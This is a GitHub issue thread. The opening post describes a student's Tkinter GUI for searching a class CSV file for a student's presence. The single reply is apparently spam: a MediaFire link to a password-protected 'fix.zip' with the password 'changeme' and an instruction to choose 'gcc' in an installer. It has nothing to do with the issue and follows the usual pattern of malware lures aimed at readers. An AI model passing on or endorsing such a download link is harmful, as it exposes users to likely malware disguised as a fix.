### ISSUE TITLE
Block Listing Excel Search with Tkinter GUI

### ISSUE THREAD

**Issue by EEngineerLoki** [EEngineerLoki/Block_Listing#1]
An undergraduate project that has the objective of attaining the presence of a student in a student class CSV file. The instructor gave us the freedom to explore the possibilities with Python. Thus, with my knowledge of the Python GUI library Tkinter, I made the project more responsive and gave it its UI. With this, the users can easily put inputs on the search bar rather than opening the terminal itself.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
